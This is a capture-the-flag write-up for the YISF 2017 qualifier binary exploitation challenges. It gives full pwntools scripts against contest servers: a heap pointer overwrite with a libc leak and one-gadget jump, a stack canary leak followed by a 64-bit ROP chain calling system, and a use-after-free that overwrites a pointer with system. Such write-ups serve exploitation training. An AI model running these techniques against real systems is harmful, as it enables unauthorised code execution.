YISF 2017 Quals all pwnable 본문
50 - Just an integer overflow when selling, then get the flag
100 - Just a buffer overflow, then get the flag
150 - Heap pointer overwrite
from pwn import *
# Tube every helper below talks through. The commented-out process() line is
# the local alternative; the remote() form targets the contest service.
# s = process('./item')
HOST, PORT = '112.166.114.143', 317
s = remote(HOST, PORT)
def add(data):
    """Menu option 1: create an item whose content is *data*.

    Each prompt the service sends is echoed to stdout before it is
    answered; *data* goes out with a trailing newline (sendline).
    """
    dialogue = [
        ('> ', '1'),
        ('input content: ', data),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
def show():
    """Menu option 2.

    Only the selection is sent; the caller reads whatever the service
    prints in reply.
    """
    print(s.recvuntil('> '))
    s.sendline('2')
def delete(idx):
    """Menu option 3: delete the item at index *idx* (sent as str(idx))."""
    dialogue = [
        ('> ', '3'),
        ('input index of item to be deleted: ', str(idx)),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
def modify(idx, data):
    """Menu option 4: replace the content of item *idx* with *data*.

    Unlike add(), the content is written with send() -- no newline is
    appended, so *data* must already be exactly what the service should
    receive.
    """
    dialogue = [
        ('> ', '4'),
        ('input index of item to modify: ', str(idx)),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
    print(s.recvuntil('input content: '))
    s.send(data)
add('aaaa')
add('bbbb')
delete(0)
# Delete index 0, then add again with 120 bytes of padding followed by a
# packed 32-bit address. The listing printed after show() is scanned for the
# marker '[1633771873] - ' and the 6 bytes after it are taken as a pointer.
add('a'*120 + p32(0x602018))
show()
print s.recvuntil('[1633771873] - ')
# 6 leaked bytes, zero-padded to 8, unpacked as a little-endian u64.
printf_leak = u64(s.recv(6).ljust(8, '\x00'))
# Offsets are hard-coded for the target's libc build and do not carry over
# to any other build -- re-derive them from the actual library before reuse.
base = printf_leak - 0x54340
system = base + 0x46590
oneshot = base + 0x46428
log.info('printf_leak : ' + hex(printf_leak))
log.info('base : ' + hex(base))
# NOTE(review): `system` is computed and logged but never used below.
log.info('system : ' + hex(system))
log.info('oneshot : ' + hex(oneshot))
# Same sequence a second time (delete index 2, add the padded entry). The
# marker now appears twice in the listing; the value after the second one is
# read.
add('cccc')
add('dddd')
delete(2)
add('a'*120 + p32(0x602018))
show()
print s.recvuntil('[1633771873] - ')
print s.recvuntil('[1633771873] - ')
free_leak = u64(s.recv(6).ljust(8, '\x00'))
# NOTE(review): free_leak is only logged; nothing below depends on it.
log.info('free_leak : ' + hex(free_leak))
# modify() uses send(), so exactly the 8 packed bytes are written.
modify(1, p64(oneshot))
s.interactive()
200 - Canary leak, 64-bit ROP
from pwn import *
# Tube for the whole script. The commented-out process() line is the local
# alternative; the remote() form targets the contest service.
# s = process('./pokemon_manager')
HOST, PORT = "112.166.114.145", 3137
s = remote(HOST, PORT)
raw_input("$")
print s.recvuntil("name: ")
s.send("A"*0x38)
print s.recvuntil("age: ")
s.sendline("-1")
print s.recvuntil("> ")
s.sendline("1")
print s.recvuntil("name: ")
s.sendline("asdf")
print s.recvuntil("level: ")
s.sendline("10")
print s.recvuntil("comment: ")
s.sendline("asdf")
print s.recvuntil("> ")
s.sendline("4")
print s.recvuntil("name: ")
s.send("B"*0x40)
print s.recvuntil("level: ")
s.sendline("1")
print s.recvuntil("comment: ")
s.send("D"*0x11c + "QQQQQ")
print s.recvuntil("> ")
s.sendline("3")
print s.recvuntil("> ")
s.sendline("4")
print s.recvuntil("beam")
s.sendline("1")
sleep(2)
print s.recvuntil("> ")
s.sendline("2")
print s.recvuntil("QQQQQ")
recved = s.recv(7)
canary = u64("\x00" + recved)
print "canary: " + hex(canary)
s.sendline("4")
print s.recvuntil("name: ")
s.send("B"*0x40)
print s.recvuntil("level: ")
s.sendline("1")
print s.recvuntil("comment: ")
payload = "D"*0x120
payload += p64(canary)
payload += "A"*8
payload += p64(0x401f63) # pop rdi
payload += p64(4)
payload += p64(0x401f61) # pop rsi, pop r15
payload += p64(0x603060) # alarm
payload += p64(0x0)
payload += p64(0x4009a0) # write_plt
payload += p64(0x401f61) # pop rsi, pop r15
payload += p64(0x6030c8) # fork@got
payload += p64(0x0)
payload += p64(0x400a20) # read@plt
payload += p64(0x401f61) # pop rsi, pop r15
payload += p64(0x6030c8+8) # sleep@got
payload += p64(0x0)
payload += p64(0x400a20) # read@plt
payload += p64(0x401f63) # pop rdi
payload += p64(0x6030c8+8) # sleep@got
payload += p64(0x400ad0) # fork_plt
s.send(payload)
print s.recvuntil("> ")
s.sendline("5")
print s.recvuntil("quitting...\n")
recved = s.recv(6)
alarm_libc = u64(recved + "\x00\x00")
libc_base = alarm_libc - 0xcc200
system = libc_base + 0x45390
print "alarm: " + hex(alarm_libc)
s.sendline(p64(system))
s.sendline("cat flag>&4\x00")
s.interactive()
300 - Tricky UAF
from pwn import *
# Tube every helper below talks through. This script runs the binary
# locally; the commented-out remote() line is the contest-service form.
# s = remote('112.166.114.147', 31337)
BINARY = '/home/cdor1/rating'
s = process(BINARY)
def show():
    """Menu option 1.

    Only the selection is sent; the caller reads whatever the service
    prints in reply.
    """
    print(s.recvuntil('> '))
    s.sendline('1')
def add(name, rating, comment):
    """Menu option 2: add a row.

    *name* and str(*rating*) are sent as lines. The comment is written with
    send() -- no trailing newline -- unlike insert() and modify(), which
    sendline() it.
    """
    dialogue = [
        ('> ', '2'),
        ('input name: ', name),
        ('input rating: ', str(rating)),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
    print(s.recvuntil('input comment of this row: '))
    s.send(comment)
def insert(idx, name, rating, comment):
    """Menu option 3: insert a row.

    *idx* answers the "row that will follow" prompt (sent as str(idx));
    then name, str(rating) and comment are each sent as a line.
    """
    dialogue = [
        ('> ', '3'),
        ('input index of row that will follow: ', str(idx)),
        ('input name: ', name),
        ('input rating: ', str(rating)),
        ('input comment of this row: ', comment),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
def delete(idx):
    """Menu option 4: delete the row at index *idx* (sent as str(idx))."""
    dialogue = [
        ('> ', '4'),
        ('input index of row to delete: ', str(idx)),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
def modify(idx, name, rating, comment):
    """Menu option 5: overwrite row *idx* with the given fields.

    Every value, including the comment, is sent as a line (sendline), so a
    newline follows the comment on the wire.
    """
    dialogue = [
        ('> ', '5'),
        ('input index of row to modify: ', str(idx)),
        ('input name: ', name),
        ('input rating: ', str(rating)),
        ('input comment of this row: ', comment),
    ]
    for prompt, reply in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(reply)
add('a'*24, -1, '/bin/sh\x00')
add('b'*24, -1, 'c'*48)
# Five modify() calls on index 5 with identical name/rating. The comment is
# 0x18 'A's plus a 'B' tail that shrinks by one byte per call and ends in a
# NUL; the final call swaps the tail for the three raw bytes 18 20 60.
# modify() sendline()s the comment, so a newline follows the NUL each time.
modify(5, 'a'*24, 10, "A"*0x18 + "B"*7 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "B"*6 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "B"*5 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "B"*4 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "\x18\x20\x60" + "\x00")
delete(5)
# Menu 5 (modify) entered by hand, without waiting for the '> ' prompt:
# output up to the 24-'a' name is skipped and the next 6 bytes are the leak,
# zero-padded to 8 and unpacked as a little-endian u64.
s.sendline('5')
print s.recvuntil('aaaaaaaaaaaaaaaaaaaaaaaa')
leak = u64(s.recv(6).ljust(8, '\x00'))
# 3961670 == 0x3c7346 (decimal here, hex everywhere else). Both offsets are
# hard-coded for one libc build and must be re-derived for any other.
base = leak - 3961670
system = base + 0x45390
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
# Remainder of the modify() prompt sequence, done inline rather than via the
# helper because the leak above had to be read in the middle of it.
print s.recvuntil('input index of row to modify: ')
s.sendline('6')
print s.recvuntil('input name: ')
s.sendline('a'*24)
print s.recvuntil('input rating: ')
s.sendline('-1')
print s.recvuntil('input comment of this row: ')
s.sendline(p64(system))
delete(4)
s.interactive()